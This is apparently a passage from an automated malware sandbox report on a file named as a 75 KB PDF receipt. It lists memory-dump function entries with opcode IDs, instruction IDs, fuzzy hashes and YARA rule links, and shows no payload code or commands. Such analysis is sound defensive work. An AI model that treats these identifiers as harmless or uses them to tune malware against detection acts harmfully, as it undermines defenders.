                                                                                                                                                          • Instruction Fuzzy Hash: 48214C70A04388CFC704DFA4C8586ACBBBAFB95705B108659D82ADB3A9DB305C02CF51
                                                                                                                                                          Function 0B84BC19 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6bb35a56912d1214c9b2812858127b6f71a868c6a5a3c3f1791b8d381e852c5c
                                                                                                                                                          • Instruction ID: 0ad8161e05c858f2b08430fafe9f63d4cab20a55efa75c00c738cdae26cc1eb5
                                                                                                                                                          • Opcode Fuzzy Hash: 6bb35a56912d1214c9b2812858127b6f71a868c6a5a3c3f1791b8d381e852c5c
                                                                                                                                                          • Instruction Fuzzy Hash: 8121CCB0D056988FDB19CF6AD8543DEBFF6AFC9300F08C0AAD449A7264DB7509458F51
                                                                                                                                                          Function 056F9B60 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 03345362cb389c09d1e550b52e02a2f3e991ce0144059ea32d6592f7a46c324b
                                                                                                                                                          • Instruction ID: 8adea7d4b064be06ee82742d28c152c4e5c31b0b5b48d2f66d01ab0a005848bf
                                                                                                                                                          • Opcode Fuzzy Hash: 03345362cb389c09d1e550b52e02a2f3e991ce0144059ea32d6592f7a46c324b
                                                                                                                                                          • Instruction Fuzzy Hash: 8A2110B1D05308AFDB10CF9AD884A9EFBF4FB48310F10802EE919A7300C374A904CBA5
                                                                                                                                                          Function 056FB780 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fe42495d726e0ad74d42b0e6d2f2f8cfcf4b76e16fd86b551bc53fd441457e7e
                                                                                                                                                          • Instruction ID: c30ee2dd4fec73c457eba5bd5f01f106f4cf4a01210d65775b7a6078993ebfc0
                                                                                                                                                          • Opcode Fuzzy Hash: fe42495d726e0ad74d42b0e6d2f2f8cfcf4b76e16fd86b551bc53fd441457e7e
                                                                                                                                                          • Instruction Fuzzy Hash: ED01E171A082184FC748EB78885065F7FEAEFC5250B14857A950ACB3D4ED348C41C3A1
                                                                                                                                                          Function 015FD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1723193326.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_15fd000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                          • Instruction ID: 44a1206c9fcd37ff8e7f86410318672e6e36afbf540fd5ea981f9b2b77aaf62c
                                                                                                                                                          • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                          • Instruction Fuzzy Hash: FA119D76504280CFDB16CF54D5C4B1ABF72FB84218F24C6A9D9490F656C33AD45ACBA2
                                                                                                                                                          Function 0B845294 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ce83fdac89005a18ab12d1d0ab55458b5651352365890cad01033964191ed51a
                                                                                                                                                          • Instruction ID: 08aa946fdfa60cf0949d3bc60b183b846fd5c9ad8b98c8439648122746a58786
                                                                                                                                                          • Opcode Fuzzy Hash: ce83fdac89005a18ab12d1d0ab55458b5651352365890cad01033964191ed51a
                                                                                                                                                          • Instruction Fuzzy Hash: 3A21D3B59003499FCB10DF9AD844ADEBFF4FB48350F108419E929A7310D375A954CFA5
                                                                                                                                                          Function 0B84B7C0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9b28817aaecb1e3c2204ae9b9d2d6c8191d1c70662fb0f697b76d1b149f9b3b9
                                                                                                                                                          • Instruction ID: 6ae393021d203f467c292b47b34433cf9e303d4751b7cca69bfd9ba529b89184
                                                                                                                                                          • Opcode Fuzzy Hash: 9b28817aaecb1e3c2204ae9b9d2d6c8191d1c70662fb0f697b76d1b149f9b3b9
                                                                                                                                                          • Instruction Fuzzy Hash: 9F11F074E0920DDFCB44DFA9C1409AEBBF5AB49314F0595AAD418EB226D770AA41CF40
                                                                                                                                                          Function 056F9BB8 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3c8d440ab306b755606e35a7d25a73f3a6c0840fcc75ba930b942e14e3b38389
                                                                                                                                                          • Instruction ID: 1f9f2ebcf94d7785dc66ee9a1b357402cf6de5951a411b8296e38b760cc6fd88
                                                                                                                                                          • Opcode Fuzzy Hash: 3c8d440ab306b755606e35a7d25a73f3a6c0840fcc75ba930b942e14e3b38389
                                                                                                                                                          • Instruction Fuzzy Hash: 4D21D3B5D002499FCB10DF9AD544ADEFBF8FB48320F10841AE959A7310D375A944CFA1
                                                                                                                                                          Function 0B84BEA5 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4fb23055a95ec1affb89b5937bd5d3f65403990de6a510e3627420f49c1cb401
                                                                                                                                                          • Instruction ID: be2f1e0fadf87aa41dfcd6e9bf55ba941c4d43b7be77c43d7d2e805aa59bbae0
                                                                                                                                                          • Opcode Fuzzy Hash: 4fb23055a95ec1affb89b5937bd5d3f65403990de6a510e3627420f49c1cb401
                                                                                                                                                          • Instruction Fuzzy Hash: E721E434A09258CFDB14CF58D994BE8BBB5FB49305F5090EAE84AAB351D771AE81CF10
                                                                                                                                                          Function 056FF390 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 09a0bb9eb57c03053c0eb490c00473421def94cda74e22be13e77b68e0113a3b
                                                                                                                                                          • Instruction ID: 6d2ef8de3d0706ee58c434dfbccb27e1d444b4558d6bcfb4f5fa23d316822fd6
                                                                                                                                                          • Opcode Fuzzy Hash: 09a0bb9eb57c03053c0eb490c00473421def94cda74e22be13e77b68e0113a3b
                                                                                                                                                          • Instruction Fuzzy Hash: 3001D431B0D3859FDB06CB798824559BFFADF8221072686EBD145DB2A7EB34A801C791
                                                                                                                                                          Function 056FBEF3 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f3aaa330fa03217c143819877655809c6962ff4923a81b4f6c4f5c8a4122e6f3
                                                                                                                                                          • Instruction ID: a9135ef6221ae1ac3ae1b7e1581456e70b207cb25d6144dfc6e0264292ec8797
                                                                                                                                                          • Opcode Fuzzy Hash: f3aaa330fa03217c143819877655809c6962ff4923a81b4f6c4f5c8a4122e6f3
                                                                                                                                                          • Instruction Fuzzy Hash: 62118C35B50218CFCB049F68E559AA97BE6EF88611F2440AAE502DB361CFB58C01CB80
                                                                                                                                                          Function 0160D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1723254561.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_160d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                          • Instruction ID: f9526910ccae3cf0a086f796e517bfd8bff411fa78db618b500c1d5b283b3be7
                                                                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                          • Instruction Fuzzy Hash: EA11BB75504280DFDB06CF98C9C4B16BFA1FB84224F24C6AAD9494B796C33AD40ACB61
                                                                                                                                                          Function 0B846718 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6a7730421f983c0003deb35914c86635a8a9a2ebdaf1ae0eec986bfa2b619bf8
                                                                                                                                                          • Instruction ID: b2fb37a611cf29b0cced5c1a346472a97af084af31566933b24f6e065f8c37c9
                                                                                                                                                          • Opcode Fuzzy Hash: 6a7730421f983c0003deb35914c86635a8a9a2ebdaf1ae0eec986bfa2b619bf8
                                                                                                                                                          • Instruction Fuzzy Hash: 35112BB4E0520ADFCB48CFA9D6411AEBFF1EB8A310F2481AAD405E3314E7345A409B51
                                                                                                                                                          Function 056FEE80 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7778cef593cc42576b05d7b849b7b8f6d0a588ef762260f96b0fc5869312ed2d
                                                                                                                                                          • Instruction ID: f64c6c2f41bda73813fcc14ac56c0fa63ccf043c20e3de693f9bd6e546c6acec
                                                                                                                                                          • Opcode Fuzzy Hash: 7778cef593cc42576b05d7b849b7b8f6d0a588ef762260f96b0fc5869312ed2d
                                                                                                                                                          • Instruction Fuzzy Hash: 981100B1C006098FCB10DF9AD448A8EFBF8EB48320F20801AE858A3214D779A545CFA5
                                                                                                                                                          Function 056FD7B4 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 32cfe7e5000b0fc73aa6b350dac3ee920802f4ab1d525783dde1ebd4837d7b07
                                                                                                                                                          • Instruction ID: fd4afa38dcbb51cd47f086f6d492705042781585a73246359ce1c3aba799753e
                                                                                                                                                          • Opcode Fuzzy Hash: 32cfe7e5000b0fc73aa6b350dac3ee920802f4ab1d525783dde1ebd4837d7b07
                                                                                                                                                          • Instruction Fuzzy Hash: 271134B1C006488FCB20DF9AD444ADEFBF8EB48320F10C02AE859A7310D379A944CFA0
                                                                                                                                                          Function 056FD6C4 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 034e7e27f8a72217f7267168a5c1f9a4bbdbd7b3542f4f2927160865daf28b85
                                                                                                                                                          • Instruction ID: ed6f5a1a874aca1ac7993b81384ffaf3f5bb161140aee764be7486b34650d17d
                                                                                                                                                          • Opcode Fuzzy Hash: 034e7e27f8a72217f7267168a5c1f9a4bbdbd7b3542f4f2927160865daf28b85
                                                                                                                                                          • Instruction Fuzzy Hash: 691104B1D046499FCB20DF9AD444ADEFBF8EB48320F10C42AE859A7710D379A945CFA5
                                                                                                                                                          Function 0B84C678 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0a68d3d13d5b9238d617629df0d00cde4610eb6f9852f2d24a390a628a4fd308
                                                                                                                                                          • Instruction ID: f788756c01e2d9ef7df9be26da1e42636a1b3d59ff04dadab225c2e8d2c3a939
                                                                                                                                                          • Opcode Fuzzy Hash: 0a68d3d13d5b9238d617629df0d00cde4610eb6f9852f2d24a390a628a4fd308
                                                                                                                                                          • Instruction Fuzzy Hash: 1D111C74D05218DFDB08CFAAD4449AEBBFAEF89300F00D02AE815A7360DB309541CF51
                                                                                                                                                          Function 0B84855D Relevance: .0, Instructions: 50COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2fb9762fd452ecce5eaced9b6164aca281e0fc3f9f4d6b027d4989f662c0d93b
                                                                                                                                                          • Instruction ID: 03b1531d1ceec3d34b31640495c0b7648452dff82a3d85fd2e9890beab154ebf
                                                                                                                                                          • Opcode Fuzzy Hash: 2fb9762fd452ecce5eaced9b6164aca281e0fc3f9f4d6b027d4989f662c0d93b
                                                                                                                                                          • Instruction Fuzzy Hash: 051148B4E0120ADFCB48DFA9D54419EBBF2AB88300F20C5AAD405E3354E7309B40CB51
                                                                                                                                                          Function 0B848560 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7c229399ca8db9fa843918578ed55999e6035d7a3d2af5271de4c8517f57b80d
                                                                                                                                                          • Instruction ID: a10056b49ba48e67248a3bed55fe75a19809d92e56c183ac4e650c64de570f3c
                                                                                                                                                          • Opcode Fuzzy Hash: 7c229399ca8db9fa843918578ed55999e6035d7a3d2af5271de4c8517f57b80d
                                                                                                                                                          • Instruction Fuzzy Hash: 3C1115B4E0520EDFDB48DFA9D54469EBBF2AB88304F20C5AA9815E3364E774DA01CB51
                                                                                                                                                          Function 0B8484A0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1f6c0010a7e93fcdbb855e367ee3c0d7ec999016a85caf8847abb972ce33b666
                                                                                                                                                          • Instruction ID: 00296ad88d7748bb534a7fcf6e38bac7678a34e689a898a616decb27fbe18289
                                                                                                                                                          • Opcode Fuzzy Hash: 1f6c0010a7e93fcdbb855e367ee3c0d7ec999016a85caf8847abb972ce33b666
                                                                                                                                                          • Instruction Fuzzy Hash: B51103B4E0521EDBCB44DFA9D5416AEBBF6EF88200F20D4AA8419E7224E7309A00CB50
                                                                                                                                                          Function 0B845F60 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ec7be10761069ea413b9ffd303394af55c5cd62e174892bae6299d128698a826
                                                                                                                                                          • Instruction ID: 4bcefb4949295ccd6e47de6f08aa1f803d540401f4c1344a7948be2b2bd03e3c
                                                                                                                                                          • Opcode Fuzzy Hash: ec7be10761069ea413b9ffd303394af55c5cd62e174892bae6299d128698a826
                                                                                                                                                          • Instruction Fuzzy Hash: 57112AB4E0520E9FCB45CFA9D54159EBBB6BB99300F14C0AAD818E7354EB309B01CB51
                                                                                                                                                          Function 056FDBF2 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7f0e60d0564df5f8d29e752e4ba416778e9810e9188ad7bc8b29eed2f7c5ab99
                                                                                                                                                          • Instruction ID: 112284b34d7bdfec44e2fa28c0352eaa66ffe695b1306414239793246636d582
                                                                                                                                                          • Opcode Fuzzy Hash: 7f0e60d0564df5f8d29e752e4ba416778e9810e9188ad7bc8b29eed2f7c5ab99
                                                                                                                                                          • Instruction Fuzzy Hash: B4118270E00609CFEB14EF64C1587BD7AB6EF84314F14042DD201AB280CFB85D81CBA5
                                                                                                                                                          Function 056FF161 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f9e6ffcf7b683baed1b4760044c5197dc5c136e435e0612e28b21e3b76779074
                                                                                                                                                          • Instruction ID: c108e2df1f8aa3b69fb874f4f52968d3fc155f9388c3a6d587dc7175d5daf62f
                                                                                                                                                          • Opcode Fuzzy Hash: f9e6ffcf7b683baed1b4760044c5197dc5c136e435e0612e28b21e3b76779074
                                                                                                                                                          • Instruction Fuzzy Hash: 99F0F475F052549FCF06ABB958504FE7BBAABC5218B00006EE204EB380CA251E01C7EA
                                                                                                                                                          Function 056FCD90 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 35d6cad28289017f0cbb73e8f6f70536b28dee9ffaf74b2b20807c6b8f5210e6
                                                                                                                                                          • Instruction ID: d6195a46dae0b41c3c9440dca882872cdc047e4eb9bee47091ebb2f904295c80
                                                                                                                                                          • Opcode Fuzzy Hash: 35d6cad28289017f0cbb73e8f6f70536b28dee9ffaf74b2b20807c6b8f5210e6
                                                                                                                                                          • Instruction Fuzzy Hash: 7101D475E08209ABDB14DB69D405A9EFFF5FF89310F04C0AADA09C7340EA309905CF51
                                                                                                                                                          Function 0B846728 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 39e69bf04a713fde6fd28a19982adae5564fd4303e97e515a0dc023dd5612b62
                                                                                                                                                          • Instruction ID: 9023c1b26674dff0063c885055fdc9f2782697b04aaf1dbb1113e65d6d3c15c6
                                                                                                                                                          • Opcode Fuzzy Hash: 39e69bf04a713fde6fd28a19982adae5564fd4303e97e515a0dc023dd5612b62
                                                                                                                                                          • Instruction Fuzzy Hash: A211FAB4E0520EDFCB44CFA9D5815AEBBF2EB89314F20C1AA9404E3318E7309A409F91
                                                                                                                                                          Function 0B84CA38 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 014c348f2a1d08d06d6022c92356e59e6f4f1b52994a959d6ba88cca37f0cf69
                                                                                                                                                          • Instruction ID: 5464c812798b37069ca030853142fd36965ba82abfd5d07c43ea0f31e11ff7d4
                                                                                                                                                          • Opcode Fuzzy Hash: 014c348f2a1d08d06d6022c92356e59e6f4f1b52994a959d6ba88cca37f0cf69
                                                                                                                                                          • Instruction Fuzzy Hash: 5B017CB064E18DDFC706CBA584009B9BFBDAF4B608F0895D980599B172D7308A4ADF41
                                                                                                                                                          Function 056FB05B Relevance: .0, Instructions: 45COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ddb6f8fbfa99c7743eddf43a8840df992f93463080035fb9546fc1e40fb75039
                                                                                                                                                          • Instruction ID: 9d2a2af83649ad7a5cd8c025aa121bc23f7b7d46c85e0122e01889fa48b4cac0
                                                                                                                                                          • Opcode Fuzzy Hash: ddb6f8fbfa99c7743eddf43a8840df992f93463080035fb9546fc1e40fb75039
                                                                                                                                                          • Instruction Fuzzy Hash: C7019A302082018FC715DB29D81496ABBA6FFC5320B24C5AED659CB7A5CB71EC46CB50
                                                                                                                                                          Function 0B845F70 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
